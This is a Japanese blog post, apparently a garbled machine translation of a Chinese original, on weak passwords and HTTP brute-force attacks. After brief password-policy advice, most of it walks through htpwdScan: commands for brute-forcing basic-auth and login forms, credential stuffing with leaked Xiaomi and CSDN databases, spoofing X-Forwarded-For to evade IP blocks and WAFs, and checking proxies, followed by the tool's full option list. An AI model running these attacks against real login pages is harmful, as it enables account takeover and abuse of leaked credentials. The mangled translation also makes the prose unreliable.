インターフェイスの脆弱性

インターフェイスの脆弱性

著者:王漁陽

時間:2019年6月7日

弱いパスワード

弱いパスワード、人をクラックするパスワードツールを推測またはクラックするのは容易で指し、しばしば弱いパスワード偉大な害。

弱いパスワードの危険:

  • 攻撃者が簡単に、弱いパスワードやシステムの管理ページで入力すると、最終的に制御権限の目的を達成することができます
  • あなたは、弱いパスワードによって人の親戚のアカウント権限を取得することができます

データ保護と実際に弱いパスワードを使用し、透明性の高い情報。

最も一般的な弱いパスワード:

ファズ弱いパスワードます。https://github.com/TheKingOfDuck/fuzzDicts

ネットワークの専門家のアドバイスは:「+ケース+デジタル+文字記号は」比較的安全なパスワードポリシーであります

いくつかのパスワードの提案:

  1. 純粋なデジタルパスワードポリシーとしてNA
  2. パスワードポリシーなどの単純なデジタル論理回路の連続した定期的な、文字、記号の組み合わせを使用することなく、
  3. パスワードは少なくとも8でなければなりません
  4. 政策の4つの異なる文字の種類
  5. パスワード略しコンテンツなど別の名前を含めないでください

インターフェイスの脆弱性:HTTPパスワードブラスト

htpwdScan:HTTPブラスト、スクリプトライブラリを打ちます

htpwdScan:書かれたPythonのHTTPのブルートに基づいており、攻撃スクリプトライブラリを打ちます

  • サポートバッチチェックや輸入HTTP3剤には、低ヒットライブラリーが正常にWAFのほとんどをバイパスして、サイトのほとんどを攻撃することができます
  • ソーシャルネットワークライブラリ上でリークさへの直接アクセスは、ライブラリがヒット攻撃を開始しました
  • 大きな辞書をインポートするためのサポート

htpwdScanの簡単な例

  • HTTP基本認証

    htpwdScan.py -u =のhttp://auth.58.com/ -basic USER.TXT PASSWORD.TXT

    辞書にインポートするユーザー名とパスワード

  • フォームの亀裂

    htpwdScan.py -f post2.txt -dユーザー= USER.TXT passwdファイル= PASSWORD.TXT -err = "成功":偽」

    post2.txtからのインポートHTTPパッケージを捉え、ユーザーおよびpasswdのパラメータを解読する必要があり、USER.TXT PASSWORD.TXTはパスワード辞書ファイルを保存します

    成功「:偽の障害マーカーの選択は、タグは、二重引用符場合は、スラッシュでエスケープすることを忘れないでください。

  • パラメータの亀裂をGET

    htpwdScan.py -d passwdの= PASSWORD.TXT -u = "http://xxx.com/index.php?m=login&username=test&passwd=test" -get -ERR = "成功":偽」

    ここでのスクリプトはGETリクエストで伝え-getパラメータを使用します

  • 攻撃ヒットライブラリー

    htpwdScan.py -f = post.txt -databaseログイン名は、passwd = xiaomi.txt -regex = "(\ S +)\ sの+(\ S +)" -ERR = "ユーザー名またはパスワードが正しくありません" -fip

    htpwdScan.py -f = post.txt -database passwdの、ログイン名= csdn.net.sql -regex = "\ S +#(\ S +)#(\ S +)" -ERR = "ユーザー名またはパスワードが正しくありません" -fip

    CSDN図書館利用キビや打ち上げ攻撃は、ライブラリを打ちます。キャプチャHTTPリクエストがpost.txtです

    -regexパラメータ設定パラメータ)は、正規表現のファイル、必要なパケット、パケットモード括弧(から抽出されます

    キビデータ列形式[email protected] xxxxxxx、すなわち(用户名)空白字符(密码)

    (\S+)\s+(\S+) 第2の充填は、passwdを取る空白でない間は、空白以外の文字満たされたテイクのログイン名を指定することができます

    データ形式のCSDN行zdg # 12344321 # [email protected]正の表現の書き方\S+ # (\S+) # (\S+)

    最初の非空の文字列#充填passwdの後に、第2の充填ログイン名位の空白でない後

    秩序パラメータが重要であることに注意してください

    -fipランダムなIPが有効になって偽造であります

  • HTTPプロキシをチェックします

    htpwdScan.py -f = post.txt -proxylist = proxies.txt -checkproxy -suc = "ユーザー名またはパスワードが間違っています"

    サイトを解除するには、接続先のサイト、post.txtを保存するためのHTTPリクエストは、その後、-sucでマークされている通信パラメータを設定するかどうか、プロキシバッチテストを使用

    チェックするシンプルで実用的な方法:

    htpwdScan.py -u =のhttp://www.baidu.com -get -proxylist = available.txt -checkproxy -suc = "百度一下"

完全なパラメータ説明

スクリプトのサポート、より小さな特徴、下記の手順を読んで忍耐をしてください。提案されたマルチユースの-debug問題がある場合、HTTP要求を参照するためのパラメータ、問題ありませんし、その後、実際の亀裂を開始します。

usage: htpwdScan.py [options]

* An HTTP weak pass scanner. By LiJieJie *

optional arguments:
  -h, --help            显示帮助

Target:
  -u REQUESTURL         设定目标URL, 示例.
                        -u="https://www.test.com/login.php"
  -f REQUESTFILE        从文件导入HTTP请求
  -https                当从文件导入HTTP请求时,启用https(SSL)
  -get                  使用GET方法,默认: POST
  -basic  [ ...]        HTTP Basic 暴力破解.
                        示例. -basic users.dic pass.dic

Dictionary:
  -d Param=DictFile [Param=DictFile ...]
                        为参数设定字典文件,
                        支持哈希函数如 md5, md5_16, sha1.
                        示例. -d user=users.dic pass=md5(pass.dic)

Detect:
  -no302                无视302跳转, 默认302敏感
  -err ERR [ERR ...]    响应文本的破解失败标记,
                        示例. -err "user not exist" "password wrong"
  -suc SUC [SUC ...]    响应文本中的破解成功标记,
                        e.g. -suc "welcome," "admin"
  -herr HERR            响应HTTP头的破解失败标记
  -hsuc HSUC            响应HTTP头的破解成功标记
  -rtxt RetryText       响应文本中的重试标记,出现则重试请求,
                        示例. -rtxt="IP blocked"
  -rntxt RetryNoText    响应文本中的重试标记,未出现则重试请求,
                        示例. -rntxt="<body>"
  -rheader RetryHeader  响应头中的重试标记,出现则重试请求,
                        示例. -rheader="Set-Cookie:"
  -rnheader RetryNoHeader
                        响应头中的重试标记,未出现则重试请求,
                        示例. -rheader="HTTP/1.1 200 OK"

Proxy and spoof:
  -proxy Server:Port    设定少量HTTP代理
                        示例. -proxy=127.0.0.1:8000,8.8.8.8:8000
  -proxylist ProxyListFile
                        从文件批量导入HTTP代理,
                        示例. -proxylist=proxys.txt
  -checkproxy           检查代理服务器的可用性.
                        可用代理输出到 001.proxy.servers.txt
  -fip                  生成随机X-Forwarded-For欺骗源IP
  -fsid FSID            生成随机session ID. 示例. -fsid PHPSESSID
  -sleep SECONDS        每次HTTP结束,等待SECONDS秒,
                        避免IP被临时屏蔽,进入黑名单

Database attack:
  -database DATABASE    导入社工库中的数据.
                        示例. -database user,pass=csdn.txt
  -regex REGEX          从社工库中提取数据的正则表达式,必须分组.
                        示例. -regex="(\S+)\s+(\S+)"

General:
  -t THREADS            工作线程数,默认50
  -o OUTPUT             输出文件.  默认: 000.Cracked.Passwords.txt
  -debug                进入debug模式检查HTTP请求和HTTP响应
  -nov                  只显示破解成功的条目,不显示进度
  -v                    show program's version number and exit

スクリプトのインストールパッケージ分析

LINディレクトリ

  • cmdline.py:整合性を確認し、コマンドラインパラメータを解析
  • console_width.py:幅コンピュータ端末、適応の出力
  • encodings.py:プラットフォーム依存の符号化および復号化
  • proxy.py:輸入HTTPプロキシ
  • queue.py:キュー辞書を生成します
  • request_fil.py:テキストファイルを解析し、HTTPリクエストのインポートを解析し、
  • request.py:開始HTTPリクエスト、HTTPレスポンス決意ロジックの解析

dictディレクトリ

  • ディレクトリには、パスワードファイルのディレクトリです

パスワードページを爆破BurpSuite

  • げっぷソフトウェアは、ブルートフォースを使用することができます

おすすめ

転載: www.cnblogs.com/wangyuyang1016/p/10988841.html